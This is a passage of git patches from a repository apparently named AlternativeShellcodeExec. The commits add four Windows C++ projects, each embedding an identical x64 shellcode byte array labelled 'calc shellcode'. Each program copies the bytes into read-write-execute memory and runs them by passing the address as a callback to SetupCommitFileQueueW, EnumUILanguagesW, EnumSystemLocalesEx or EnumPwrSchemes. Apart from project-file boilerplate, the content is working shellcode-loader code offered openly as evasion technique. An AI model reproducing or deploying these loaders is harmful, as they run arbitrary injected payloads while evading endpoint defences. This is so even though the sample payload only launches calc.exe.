++++++++++++++++++ .../SetupCommitFileQueueW.vcxproj.filters | 22 +++ 4 files changed, 225 insertions(+) create mode 100644 SetupCommitFileQueueW/SetupCommitFileQueueW.cpp create mode 100644 SetupCommitFileQueueW/SetupCommitFileQueueW.vcxproj create mode 100644 SetupCommitFileQueueW/SetupCommitFileQueueW.vcxproj.filters diff --git a/AlternativeShellcodeExec.sln b/AlternativeShellcodeExec.sln index c4a9398..1fcbbbb 100644 --- a/AlternativeShellcodeExec.sln +++ b/AlternativeShellcodeExec.sln @@ -61,6 +61,8 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumLanguageGroupLocalesW", EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SetTimer", "SetTimer\SetTimer.vcxproj", "{B014BCB9-7850-4AC7-BD7F-6B07DB77DE35}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SetupCommitFileQueueW", "SetupCommitFileQueueW\SetupCommitFileQueueW.vcxproj", "{86E9BEC1-C77A-449C-9D89-4E1ABA9DFB0F}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 @@ -301,6 +303,14 @@ Global {B014BCB9-7850-4AC7-BD7F-6B07DB77DE35}.Release|x64.Build.0 = Release|x64 {B014BCB9-7850-4AC7-BD7F-6B07DB77DE35}.Release|x86.ActiveCfg = Release|Win32 {B014BCB9-7850-4AC7-BD7F-6B07DB77DE35}.Release|x86.Build.0 = Release|Win32 + {86E9BEC1-C77A-449C-9D89-4E1ABA9DFB0F}.Debug|x64.ActiveCfg = Debug|x64 + {86E9BEC1-C77A-449C-9D89-4E1ABA9DFB0F}.Debug|x64.Build.0 = Debug|x64 + {86E9BEC1-C77A-449C-9D89-4E1ABA9DFB0F}.Debug|x86.ActiveCfg = Debug|Win32 + {86E9BEC1-C77A-449C-9D89-4E1ABA9DFB0F}.Debug|x86.Build.0 = Debug|Win32 + {86E9BEC1-C77A-449C-9D89-4E1ABA9DFB0F}.Release|x64.ActiveCfg = Release|x64 + {86E9BEC1-C77A-449C-9D89-4E1ABA9DFB0F}.Release|x64.Build.0 = Release|x64 + {86E9BEC1-C77A-449C-9D89-4E1ABA9DFB0F}.Release|x86.ActiveCfg = Release|Win32 + {86E9BEC1-C77A-449C-9D89-4E1ABA9DFB0F}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/SetupCommitFileQueueW/SetupCommitFileQueueW.cpp b/SetupCommitFileQueueW/SetupCommitFileQueueW.cpp new file mode 100644 index 0000000..0445cbb --- /dev/null +++ b/SetupCommitFileQueueW/SetupCommitFileQueueW.cpp @@ -0,0 +1,46 @@ +#include +#include + +#include +#pragma comment(lib, "Setupapi.lib") + +// alfarom256 calc shellcode +unsigned char op[] = +"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" +"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" +"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" +"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" +"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" +"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" +"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" +"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" +"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" +"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" +"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" +"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" +"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" +"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" +"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" +"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" +"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" +"\x63\x2e\x65\x78\x65\x00"; + + + + +int main() { + + + LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); + memcpy(address, &op[0], sizeof(op)); + + + HSPFILEQ hQueue = ::SetupOpenFileQueue(); + ::SetupQueueCopyW(hQueue, L"c:\\", L"\\windows\\sytem32\\", L"kernel32.dll", NULL, NULL, L"c:\\windows\\temp\\", L"kernel32.dll", SP_COPY_NOSKIP); + ::SetupCommitFileQueueW(::GetTopWindow(NULL), hQueue, (PSP_FILE_CALLBACK_W)address, NULL); + + + return 0; + +} \ No newline at end of file diff --git a/SetupCommitFileQueueW/SetupCommitFileQueueW.vcxproj b/SetupCommitFileQueueW/SetupCommitFileQueueW.vcxproj new file mode 100644 index 0000000..9a1f328 --- /dev/null +++ b/SetupCommitFileQueueW/SetupCommitFileQueueW.vcxproj @@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {86e9bec1-c77a-449c-9d89-4e1aba9dfb0f} + SetupCommitFileQueueW + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/SetupCommitFileQueueW/SetupCommitFileQueueW.vcxproj.filters b/SetupCommitFileQueueW/SetupCommitFileQueueW.vcxproj.filters new file mode 100644 index 0000000..3b9837a --- /dev/null +++ b/SetupCommitFileQueueW/SetupCommitFileQueueW.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file From 65170249c1d6e929af8fe80964ea3c380dce03d8 Mon Sep 17 00:00:00 2001 From: S4R1N Date: Thu, 8 Apr 2021 17:20:16 -0400 Subject: [PATCH 14/28] Added EnumUILanguagesW --- AlternativeShellcodeExec.sln | 10 ++ EnumUILanguagesW/EnumUILanguagesW.cpp | 38 +++++ EnumUILanguagesW/EnumUILanguagesW.vcxproj | 147 ++++++++++++++++++ .../EnumUILanguagesW.vcxproj.filters | 22 +++ 4 files changed, 217 insertions(+) create mode 100644 EnumUILanguagesW/EnumUILanguagesW.cpp create mode 100644 EnumUILanguagesW/EnumUILanguagesW.vcxproj create mode 100644 EnumUILanguagesW/EnumUILanguagesW.vcxproj.filters diff --git a/AlternativeShellcodeExec.sln b/AlternativeShellcodeExec.sln index 1fcbbbb..05088b7 100644 --- a/AlternativeShellcodeExec.sln +++ b/AlternativeShellcodeExec.sln @@ -63,6 +63,8 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SetTimer", "SetTimer\SetTim EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SetupCommitFileQueueW", "SetupCommitFileQueueW\SetupCommitFileQueueW.vcxproj", "{86E9BEC1-C77A-449C-9D89-4E1ABA9DFB0F}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumUILanguagesW", "EnumUILanguagesW\EnumUILanguagesW.vcxproj", "{F9EBC138-CEBA-4927-B9C2-AB6B751AB89E}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 @@ -311,6 +313,14 @@ Global {86E9BEC1-C77A-449C-9D89-4E1ABA9DFB0F}.Release|x64.Build.0 = Release|x64 {86E9BEC1-C77A-449C-9D89-4E1ABA9DFB0F}.Release|x86.ActiveCfg = Release|Win32 {86E9BEC1-C77A-449C-9D89-4E1ABA9DFB0F}.Release|x86.Build.0 = Release|Win32 + {F9EBC138-CEBA-4927-B9C2-AB6B751AB89E}.Debug|x64.ActiveCfg = Debug|x64 + {F9EBC138-CEBA-4927-B9C2-AB6B751AB89E}.Debug|x64.Build.0 = Debug|x64 + {F9EBC138-CEBA-4927-B9C2-AB6B751AB89E}.Debug|x86.ActiveCfg = Debug|Win32 + {F9EBC138-CEBA-4927-B9C2-AB6B751AB89E}.Debug|x86.Build.0 = Debug|Win32 + {F9EBC138-CEBA-4927-B9C2-AB6B751AB89E}.Release|x64.ActiveCfg = Release|x64 + {F9EBC138-CEBA-4927-B9C2-AB6B751AB89E}.Release|x64.Build.0 = Release|x64 + {F9EBC138-CEBA-4927-B9C2-AB6B751AB89E}.Release|x86.ActiveCfg = Release|Win32 + {F9EBC138-CEBA-4927-B9C2-AB6B751AB89E}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/EnumUILanguagesW/EnumUILanguagesW.cpp b/EnumUILanguagesW/EnumUILanguagesW.cpp new file mode 100644 index 0000000..7b1b6b2 --- /dev/null +++ b/EnumUILanguagesW/EnumUILanguagesW.cpp @@ -0,0 +1,38 @@ +#include +#include + +// alfarom256 calc shellcode +unsigned char op[] = +"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" +"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" +"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" +"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" +"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" +"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" +"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" +"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" +"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" +"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" +"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" +"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" +"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" +"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" +"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" +"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" +"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" +"\x63\x2e\x65\x78\x65\x00"; + + + + +int main() { + + + LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); + memcpy(address, &op[0], sizeof(op)); + + ::EnumUILanguagesW((UILANGUAGE_ENUMPROCW)address, MUI_LANGUAGE_ID, NULL); + return 0; + +} \ No newline at end of file diff --git a/EnumUILanguagesW/EnumUILanguagesW.vcxproj b/EnumUILanguagesW/EnumUILanguagesW.vcxproj new file mode 100644 index 0000000..69ca974 --- /dev/null +++ b/EnumUILanguagesW/EnumUILanguagesW.vcxproj @@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {f9ebc138-ceba-4927-b9c2-ab6b751ab89e} + EnumUILanguagesW + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/EnumUILanguagesW/EnumUILanguagesW.vcxproj.filters b/EnumUILanguagesW/EnumUILanguagesW.vcxproj.filters new file mode 100644 index 0000000..b9cc20a --- /dev/null +++ b/EnumUILanguagesW/EnumUILanguagesW.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file From bfa2913c26671765134423fd4e0d13befb920bc2 Mon Sep 17 00:00:00 2001 From: S4R1N Date: Fri, 9 Apr 2021 17:01:46 -0400 Subject: [PATCH 15/28] Just keep on truckin --- AlternativeShellcodeExec.sln | 10 ++ EnumSystemLocales/EnumSystemLocales.cpp | 38 +++++ EnumSystemLocales/EnumSystemLocales.vcxproj | 147 ++++++++++++++++++ .../EnumSystemLocales.vcxproj.filters | 22 +++ 4 files changed, 217 insertions(+) create mode 100644 EnumSystemLocales/EnumSystemLocales.cpp create mode 100644 EnumSystemLocales/EnumSystemLocales.vcxproj create mode 100644 EnumSystemLocales/EnumSystemLocales.vcxproj.filters diff --git a/AlternativeShellcodeExec.sln b/AlternativeShellcodeExec.sln index 05088b7..fd9be1c 100644 --- a/AlternativeShellcodeExec.sln +++ b/AlternativeShellcodeExec.sln @@ -65,6 +65,8 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SetupCommitFileQueueW", "Se EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumUILanguagesW", "EnumUILanguagesW\EnumUILanguagesW.vcxproj", "{F9EBC138-CEBA-4927-B9C2-AB6B751AB89E}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumSystemLocales", "EnumSystemLocales\EnumSystemLocales.vcxproj", "{C9CDA752-24AF-48CC-9F54-A695A453A929}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 @@ -321,6 +323,14 @@ Global {F9EBC138-CEBA-4927-B9C2-AB6B751AB89E}.Release|x64.Build.0 = Release|x64 {F9EBC138-CEBA-4927-B9C2-AB6B751AB89E}.Release|x86.ActiveCfg = Release|Win32 {F9EBC138-CEBA-4927-B9C2-AB6B751AB89E}.Release|x86.Build.0 = Release|Win32 + {C9CDA752-24AF-48CC-9F54-A695A453A929}.Debug|x64.ActiveCfg = Debug|x64 + {C9CDA752-24AF-48CC-9F54-A695A453A929}.Debug|x64.Build.0 = Debug|x64 + {C9CDA752-24AF-48CC-9F54-A695A453A929}.Debug|x86.ActiveCfg = Debug|Win32 + {C9CDA752-24AF-48CC-9F54-A695A453A929}.Debug|x86.Build.0 = Debug|Win32 + {C9CDA752-24AF-48CC-9F54-A695A453A929}.Release|x64.ActiveCfg = Release|x64 + {C9CDA752-24AF-48CC-9F54-A695A453A929}.Release|x64.Build.0 = Release|x64 + {C9CDA752-24AF-48CC-9F54-A695A453A929}.Release|x86.ActiveCfg = Release|Win32 + {C9CDA752-24AF-48CC-9F54-A695A453A929}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/EnumSystemLocales/EnumSystemLocales.cpp b/EnumSystemLocales/EnumSystemLocales.cpp new file mode 100644 index 0000000..d3dff09 --- /dev/null +++ b/EnumSystemLocales/EnumSystemLocales.cpp @@ -0,0 +1,38 @@ +#include +#include + +// alfarom256 calc shellcode +unsigned char op[] = +"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" +"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" +"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" +"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" +"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" +"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" +"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" +"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" +"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" +"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" +"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" +"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" +"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" +"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" +"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" +"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" +"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" +"\x63\x2e\x65\x78\x65\x00"; + + + + +int main() { + + + LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); + memcpy(address, &op[0], sizeof(op)); + + ::EnumSystemLocalesEx((LOCALE_ENUMPROCEX)address, LOCALE_ALL, NULL, NULL); + return 0; + +} \ No newline at end of file diff --git a/EnumSystemLocales/EnumSystemLocales.vcxproj b/EnumSystemLocales/EnumSystemLocales.vcxproj new file mode 100644 index 0000000..e363f82 --- /dev/null +++ b/EnumSystemLocales/EnumSystemLocales.vcxproj @@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {c9cda752-24af-48cc-9f54-a695a453a929} + EnumSystemLocales + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/EnumSystemLocales/EnumSystemLocales.vcxproj.filters b/EnumSystemLocales/EnumSystemLocales.vcxproj.filters new file mode 100644 index 0000000..691e773 --- /dev/null +++ b/EnumSystemLocales/EnumSystemLocales.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file From 2a4d6063ba919a72f0ad1bbed71a8ed061c61782 Mon Sep 17 00:00:00 2001 From: S4R1N Date: Sun, 11 Apr 2021 11:54:38 -0400 Subject: [PATCH 16/28] added EnumPwrSchemes --- AlternativeShellcodeExec.sln | 10 ++ EnumPwrSchemes/EnumPwrSchemes.cpp | 43 +++++ EnumPwrSchemes/EnumPwrSchemes.vcxproj | 147 ++++++++++++++++++ EnumPwrSchemes/EnumPwrSchemes.vcxproj.filters | 22 +++ 4 files changed, 222 insertions(+) create mode 100644 EnumPwrSchemes/EnumPwrSchemes.cpp create mode 100644 EnumPwrSchemes/EnumPwrSchemes.vcxproj create mode 100644 EnumPwrSchemes/EnumPwrSchemes.vcxproj.filters diff --git a/AlternativeShellcodeExec.sln b/AlternativeShellcodeExec.sln index fd9be1c..97e9afc 100644 --- a/AlternativeShellcodeExec.sln +++ b/AlternativeShellcodeExec.sln @@ -67,6 +67,8 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumUILanguagesW", "EnumUIL EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumSystemLocales", "EnumSystemLocales\EnumSystemLocales.vcxproj", "{C9CDA752-24AF-48CC-9F54-A695A453A929}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumPwrSchemes", "EnumPwrSchemes\EnumPwrSchemes.vcxproj", "{13291D07-600D-44D2-91F8-A1FEF83AB0FD}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 @@ -331,6 +333,14 @@ Global {C9CDA752-24AF-48CC-9F54-A695A453A929}.Release|x64.Build.0 = Release|x64 {C9CDA752-24AF-48CC-9F54-A695A453A929}.Release|x86.ActiveCfg = Release|Win32 {C9CDA752-24AF-48CC-9F54-A695A453A929}.Release|x86.Build.0 = Release|Win32 + {13291D07-600D-44D2-91F8-A1FEF83AB0FD}.Debug|x64.ActiveCfg = Debug|x64 + {13291D07-600D-44D2-91F8-A1FEF83AB0FD}.Debug|x64.Build.0 = Debug|x64 + {13291D07-600D-44D2-91F8-A1FEF83AB0FD}.Debug|x86.ActiveCfg = Debug|Win32 + {13291D07-600D-44D2-91F8-A1FEF83AB0FD}.Debug|x86.Build.0 = Debug|Win32 + {13291D07-600D-44D2-91F8-A1FEF83AB0FD}.Release|x64.ActiveCfg = Release|x64 + {13291D07-600D-44D2-91F8-A1FEF83AB0FD}.Release|x64.Build.0 = Release|x64 + {13291D07-600D-44D2-91F8-A1FEF83AB0FD}.Release|x86.ActiveCfg = Release|Win32 + {13291D07-600D-44D2-91F8-A1FEF83AB0FD}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/EnumPwrSchemes/EnumPwrSchemes.cpp b/EnumPwrSchemes/EnumPwrSchemes.cpp new file mode 100644 index 0000000..03533ac --- /dev/null +++ b/EnumPwrSchemes/EnumPwrSchemes.cpp @@ -0,0 +1,43 @@ +#include +#include +#include + +#pragma comment(lib, "PowrProf.lib") + +// alfarom256 calc shellcode +unsigned char op[] = +"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" +"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" +"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" +"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" +"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" +"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" +"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" +"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" +"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" +"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" +"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" +"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" +"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" +"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" +"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" +"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" +"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" +"\x63\x2e\x65\x78\x65\x00"; + + + + +int main() { + + + LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); + memcpy(address, &op[0], sizeof(op)); + + + ::EnumPwrSchemes((PWRSCHEMESENUMPROC)address, NULL); + + return 0; + +} \ No newline at end of file diff --git a/EnumPwrSchemes/EnumPwrSchemes.vcxproj b/EnumPwrSchemes/EnumPwrSchemes.vcxproj new file mode 100644 index 0000000..b1cab44 --- /dev/null +++ b/EnumPwrSchemes/EnumPwrSchemes.vcxproj @@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {13291d07-600d-44d2-91f8-a1fef83ab0fd} + EnumPwrSchemes + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/EnumPwrSchemes/EnumPwrSchemes.vcxproj.filters b/EnumPwrSchemes/EnumPwrSchemes.vcxproj.filters new file mode 100644 index 0000000..9509301 --- /dev/null +++ b/EnumPwrSchemes/EnumPwrSchemes.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file From 805bb460a8946c8f308fd9329b738cc5f49e4aab Mon Sep 17 00:00:00 